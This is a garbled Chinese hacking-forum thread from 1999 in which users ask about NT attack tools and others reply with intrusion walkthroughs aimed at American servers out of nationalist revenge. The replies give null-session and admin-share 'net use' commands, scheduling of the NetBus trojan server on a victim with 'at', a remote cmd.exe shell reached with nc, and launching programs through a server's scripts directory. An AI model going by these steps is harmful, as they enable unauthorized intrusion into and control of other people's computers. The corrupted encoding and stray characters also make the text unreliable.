《版主頁黑客工具和文章的幾個(gè)問題》中提到: u/ u8 }9 r- J* a F& v
請(qǐng)教,從版主頁上載得PINGER���,GRINDER��,LETMEIN等����,卻不能用,PINGER安裝后��,明明安裝前文件有1M多�,但安裝完后生成的文件夾中只有PINGER。EXE��,40多K����,運(yùn)行PINGER,設(shè)置好IP�����,點(diǎn)PING���,彈出一個(gè)窗口(C++�。�。��。)����,說出錯(cuò)�,然后關(guān)閉了,何故���,是不是安裝有誤���? 2�。運(yùn)行LETMEIN,彈出以下錯(cuò)誤:連接文件LETMEIN����。EXE到不存在的NETAPI32。DLL��;NETGROUPGETUSERS�����。 是否說明需要NETAPI32��。DLL文件,哪里有該DLL����。 3。USAKILLER 的教學(xué)文章中提到需在WINNT4����。0下運(yùn)行以下步驟等,是否要求我的操作系統(tǒng)也是WINNT4����。0 ,應(yīng)該不是吧���? 4���。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務(wù)器的操作系統(tǒng)為NT�? 太多的問題需高手回答,我花那么多的時(shí)間和金錢下載這幾M文件卻不能用����,實(shí)在窩囊哦, 強(qiáng)烈建議USAKILLER 等高手級(jí)的黑客寫更多的教學(xué)文章����,以提高我國黑客水平�。; K) m0 U1 `' O. h+ }
> 我的機(jī)子MMX166�,WIN98,2���。5G���,32M內(nèi)存。: s# e( B. u6 Q# q5 v3 L% ]
; {# Z% G) R7 k9 p
黑客并不神秘�����,你只要了解操作系統(tǒng)����,學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn)���,輔助相關(guān)的工具���,就可以成功。+ O1 i& R. F% |! E" a5 Y I
你的問題是��,pinger, grinder, letmein等工具必須要在NT上運(yùn)行,我們強(qiáng)烈建議�����,你一定要安裝NT�,對(duì)于你的機(jī)器配制,和我們現(xiàn)在差不多����,只是比你多了32M內(nèi)存,2G硬盤���。
% F5 W0 |8 j# r) T其實(shí)����,攻擊敵站����,利用其操作系統(tǒng)本身的工具就可以了,比如��,我們?cè)贜T上攻擊某服務(wù)器���,該服務(wù)器為NT4.0����,我們將做如下簡單事情就有可能成功,假設(shè)目標(biāo)NT的IP地址為111.111.111.111�,做法如下:3 }. u- e9 H. i# b0 m% W; V
net use \\111.111.111.111\ipc$ "" /user:""# ?: G! j2 C! b9 v+ R
net.exe是NT的工具文件,該命令將和目標(biāo)服務(wù)器建立Null Session���,如果成功���,你可以查看該服務(wù)器上的共享目錄:9 a8 t+ e, ]+ Z0 }$ H Q
net view \\111.111.111.111' F7 N: u& R4 |9 o3 F! N7 U9 V
當(dāng)然,如果你有該NT管理員密碼����,就更好辦了,假設(shè)其管理員Admin密碼為fuck:0 c' {3 s0 V- `1 w
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
# k. ^$ \6 _0 }* k( i- r命令成功后����,幾乎所有目標(biāo)NT上的配制,資源�����,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來查看或修改:
; q( E1 T- y, D1��、查看或修改遠(yuǎn)程機(jī)器上的硬盤��,假如目標(biāo)NT上有C��、D兩個(gè)硬盤:
$ W U0 b. v \# Unet use x: \\111.111.111.111\c$! S- [& Q8 M$ l, k$ ~% r; @0 f7 n% R
net use y: \\111.111.111.111\d$
) N+ }, A1 |( M這樣����,目標(biāo)NT上的C、D盤分別被影射為你本地的X����、Y盤,你想怎么做都可以...) `6 W0 e* F/ N+ ^' W" X4 w$ s2 n
2���、管理目標(biāo)NT的用戶:( O: c3 J6 r( V) N
從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”" ^; q8 V4 ~+ V+ l8 x
鍵入\\111.111.111.111后���,目標(biāo)NT上的所有用戶你想怎么做都可以,和管理你本地的一樣7 x: L9 U V: ` }
3��、管理目標(biāo)NT的服務(wù)9 s" J! \; |) w
選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域”
) i/ J; p2 X9 k! P% m這樣你可以管理目標(biāo)NT上的服務(wù)���,共享目錄
3 b4 F) N- F$ U: _2 ]4�、IIS管理
& j# \: u- a! M2 ^: P選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
4 t$ C; v* D$ ?: H目標(biāo)NT的FTP�、WWW服務(wù)你就可以重新配置
! z. Z; r7 _$ m9 S4 E) @4 Q5、事件管理 B6 D( K% Y0 B/ s$ ]1 A) @
“事件查看器”->連接到服務(wù)器->111.111.111.111# I6 f% ?$ ]; J7 c) ~% H8 }, a
. t Q* j8 J p還有更多的東西,都可以用NT本身的功能來完成�,這些都是95, 98所不能實(shí)現(xiàn)的。1 q6 B* M4 G( n" q" J0 H6 v
% R8 O7 o3 X' g$ L/ G) u6 ?
當(dāng)然��,98,95也能做一些事情�����,但很麻煩�����,比如:2 v9 m, Y9 j0 G
net use \\111.111.111.111\ipc$+ {. }) E! ]6 ?2 d0 Q) ?
net use z: \\111.111.111.111\d$
6 \6 A- l: M8 G: v; f+ m4 A0 J: \但其后不能帶參數(shù)�����,即改用其他用戶或密碼�����,系統(tǒng)將用當(dāng)前用戶和密碼去登錄�����,如果你知道目標(biāo)NT的用戶或密碼�,重新啟動(dòng)95, 98����,改用該用戶和密碼登錄����,方可實(shí)現(xiàn)�,你可以連接目標(biāo)NT上的共享資源,但不能進(jìn)行管理��,如用戶��、事件等- {* C8 H9 m& }( M
, }0 v% ^) S; A" |5 F我們強(qiáng)烈建議各位有心要為死難者報(bào)仇����,真正的想黑霉國的站點(diǎn),花點(diǎn)時(shí)間��,裝個(gè)NT吧���,NT Workstation也可以���!) u8 j, k) I8 X0 C9 b8 _, w* u' n$ L0 z
這樣,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用�!8 A) M: p" C) f% {, q) S; [" k |
, O9 r/ _* P. S- P1 X
4 e! [' B* ^8 f7 B$ t-------------------------------------------------------------------------------- G+ O3 F. r% Y2 G8 Q2 M: T
4 h% d! F% U. i# m: u>quack于1999-06-12����,23:37:44
: A. q5 l0 \* J& [ W在大作《幾個(gè)有關(guān)黑的問題》中提到:
1 I3 o4 X( _: r8 B1 L首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時(shí)候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時(shí)亦無此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢到的IP地址若無機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對(duì)了,CIH對(duì)NT暫時(shí)無效,假定上傳其它"有益"美國NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機(jī)子,但運(yùn)行程序時(shí)卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個(gè)美國人,哈!�����。: B+ W% ^7 ^% W* I- j
+ |. N- R: `' O2 Z( x& a
killusa于1999-06-13��,03:25:15
, p4 q1 ]0 h& c. n2 ^4 L' n9 Y在大作《Re: 幾個(gè)有關(guān)黑的問題》中提到:- n+ O4 w: K5 K. k3 O0 s3 X
# ?+ A8 ?* R" U' P( U5 _letmein.exe 暫時(shí)沒有mypwd參數(shù)���,十分抱歉
: |% B+ @0 n! R3 z! O0 `7 ~pinger程序�,只是利用ping來尋找主機(jī)�,每臺(tái)NT服務(wù)器有一個(gè)主IP地址,但也可以設(shè)置多個(gè)輔助IP地址�����,比如有些服務(wù)器供應(yīng)商���,一臺(tái)NT服務(wù)器上可以設(shè)置一千多個(gè)IP�����,每個(gè)IP對(duì)應(yīng)一個(gè)Hostname,而真正能找到主機(jī)名的只有一個(gè)IP地址�,就是該主機(jī)的主IP地址,所以有時(shí)顯示只有IP��,而無主機(jī)名�。另外,有些服務(wù)器是非NT的操作系統(tǒng)�,有時(shí)將不會(huì)顯示主機(jī)名����。當(dāng)然,有時(shí)在服務(wù)器上進(jìn)行一些設(shè)置����,也會(huì)出現(xiàn)上面的情況。, D' T2 n; o" c- j% ^* v' t" W5 R
2 X4 z, R/ t! B# Z2 D9 `
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個(gè)程序����,所以,netbus.exe是不用上傳的����,只需在目的
% o; C C: U4 z9 D0 {服務(wù)器上運(yùn)行ntsrv.exe,而在目的服務(wù)器運(yùn)行該程序有很多種方法:! D4 s$ O' U9 v1 j. S
" W/ n- {7 h! I( {: C( c
1����、利用服務(wù)器的 Schedule 服務(wù)來啟動(dòng)schedule 服務(wù)是指在服務(wù)器上定時(shí)運(yùn)行某程序���,具體使用方法,可在自己的NT Dos窗口下鍵入以下:
2 ^$ f# T: K. n8 V; ]5 @; D% a+ N+ ~5 I* k) b; s( M# | t
C:\>net start schedule
3 s: z/ q$ i3 XSchedule 正在啟動(dòng)服務(wù).....9 E. C9 } P2 H+ y2 G3 N( V
Schedulw 服務(wù)啟動(dòng)成功�。
2 A) @: E7 {1 k" `C:\>at /?% Q' F$ j! E: g+ l) h
AT 命令排定在特定的日期和時(shí)間運(yùn)行某些命令和程序。
2 T6 J) V# b2 l4 h! b. y# {8 c: c1 j0 i運(yùn)行 AT 命令之前必須先啟動(dòng) Schedule 服務(wù)���。* c: v4 V% c- b& W
" ]' W( u# T. p$ }. w/ i2 DAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]9 ^+ [" p- F3 v3 T4 b' e. z7 K
AT [\\computername] time [/INTERACTIVE]
1 D0 o# V' E/ x0 j# A1 k% X[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
+ K% H* c& P4 M g/ x2 H; p; p6 O2 a) T
\\computername 指定遠(yuǎn)程計(jì)算機(jī)�。 如果省略這個(gè)參數(shù)3 u0 U& @5 F! M# k( a
命令會(huì)被排定在本機(jī)上運(yùn)行�。! h, B+ o3 X% Y( X6 M& n c3 [
id 指定給排定進(jìn)度命令的識(shí)別號(hào)。
# ~( _ B- F; w/ ]
# p* N2 f) V/ V. a9 K+ d" {" L/delete 刪除某個(gè)已排定進(jìn)度的命令�。如果省略標(biāo)識(shí),計(jì)算機(jī)上所有已排定進(jìn)度的命令都會(huì)被刪除�����。
5 ~: }& h1 _/ C0 |" o \ o/yes 用于刪除所有作業(yè)���,且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息 �����。/ b0 C) ~7 z; J
time 指定命令運(yùn)行的時(shí)間�。* A9 n5 y& Q5 A$ d
/interactive 允許作業(yè)在運(yùn)行時(shí)��,與用戶通過桌面交互。
- F, O2 ?1 m; P ~0 {5 L% C1 v' I/ m# B) x& D
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令���。
( {) e" B2 y, p7 T7 W- X! T如果省略日期���,則默認(rèn)為在每月的本日運(yùn)行。& c1 q: [( a. x0 z2 e
2 w ~& B" o, Z/next:date[,...] 指定在下一個(gè)指定日期 (如����,下周三)�,運(yùn)行命令。如果省略日期��,則默認(rèn)為在每月的本日運(yùn)行���。, ?& Y" P: ] q7 C, T' F! C
+ Z: W8 X: q/ b7 |7 _& p* \5 d) `; e
"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件��。
* d0 b/ H# ~1 E! ^5 a
% `1 c6 d. M9 b2 J- `% GC:\>
3 T& f9 i! R4 }! [. I( C( `. y5 O1 n: B5 i$ C: f( s/ `- H
知道了如何使用AT����,再來看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:
* q% g# N& s7 E5 ?7 r& L1 利用管理員登陸到目的服務(wù)器�����,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"& ~, B2 U5 p, i
2 利用ntsrv.exe啟動(dòng)遠(yuǎn)程: netsvc \\x.x.x.x schedule /start8 ?1 y; Z/ t) z$ }; r
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行,當(dāng)然最快運(yùn)行最理想���,所以�,你可以用letmein.exe得到服務(wù)器的時(shí)間����,然后:$ g* ~6 U- p3 X$ f
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
) Q0 ], \, S( l5 s# C其中00:00要改為用letmein.exe得回來的具體時(shí)間+一點(diǎn)容量,等一會(huì)后�����,再在本地啟動(dòng)netbus.exe�����,鍵入目的服務(wù)器得ip地址或hostname����,連接!具體使用可參照 "How to get in nt"����,比如第一種方法,你想要在目的服務(wù)器運(yùn)行 LEGION,可以利用netbus得上傳功能���,將LEGION上傳至目的服務(wù)器���,再用netbus的"Start program",鍵入完整路徑的LEGION運(yùn)行程序��,就ok了���!第二種方法是利用netbus的“App redirect”功能��,啟動(dòng)遠(yuǎn)程telnet服務(wù)����,如下:在netbus中擊“App redirect”�,鍵入"C:\>winnt\system32\cmd.exe"�����,Port為:4321��,服務(wù)就啟動(dòng)了�����,然后在本地運(yùn)行:nc x.x.x.x 4321,出現(xiàn)dos啟動(dòng)的畫面就表示連接成功:
; Y4 q# H; i/ F$ ^4 O1 ]) wMicrosoft(R) Windows NT(TM)# Y, e2 e$ \$ ~+ ^7 S% i
(C) Copyright 1985-1996 Microsoft Corp.
2 L" x! W. C' L8 e T! dC:\>
" `0 Q% z1 M# z0 @3 k, E% R$ |/ N1 I- q1 m! \. d% ^
2���、利用web啟動(dòng)ntsrv.exe或其他程序在目的服務(wù)器
4 C& f: B. X! k$ q7 C9 N: ` c& v/ Z4 }& u; {/ t
將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄�����,如cgi-bin或scripts��,然后在瀏覽器鍵入url如:" ~6 c- T5 y) S9 F
http://x.x.x.x/scripts/ntsrv.exe /port:643217 p( B$ d7 L5 s
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
) U8 l- y: Q; l, M; z b$ l# ]該程序就啟動(dòng)了
; j! r0 {. ?/ w1 n5 I# E. q, D& z2 y
我只提這幾中方法����!( O3 m! ]! q" w {7 t: Q' h% J
要成功����,必須打好基礎(chǔ)工,對(duì)操作系統(tǒng)充分了解!
$ l0 N; m: V# K; U/ a8 c) N* e, h3 o! [
|
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡